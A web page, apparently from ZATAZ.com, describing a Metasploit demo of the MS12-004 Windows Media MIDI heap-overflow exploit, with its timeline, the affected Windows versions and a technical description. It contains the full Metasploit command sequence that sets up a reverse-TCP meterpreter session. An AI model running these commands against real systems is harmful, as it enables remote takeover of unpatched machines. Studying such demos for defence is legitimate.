aka wow on ZATAZ.com
MS12-004 Windows Media Remote Code Execution Metasploit Demo
Timeline :
Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27
PoC provided by :
Shane Garrett
juan vazquez
sinn3r
Reference(s) :
MS12-004
CVE-2012-0003
OSVDB-78210
Affected version(s) :
Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1
Tested on Windows XP SP3 with :
winmm.dll 5.1.2600.5512
Description :
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Commands :
use exploit/windows/browser/ms12_004_midi set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
- MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo
- MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo
- MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo
- MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
- Metasploit Exploitation Scenarios – Scenario 2 Lavasoft Ad-Aware & Windows Defender
- Metasploit Exploitation Scenarios – Scenario 1
- MS11-011 : Windows UAC Bypass 0day
- MS10-046 : Microsoft Windows Shell LNK Execution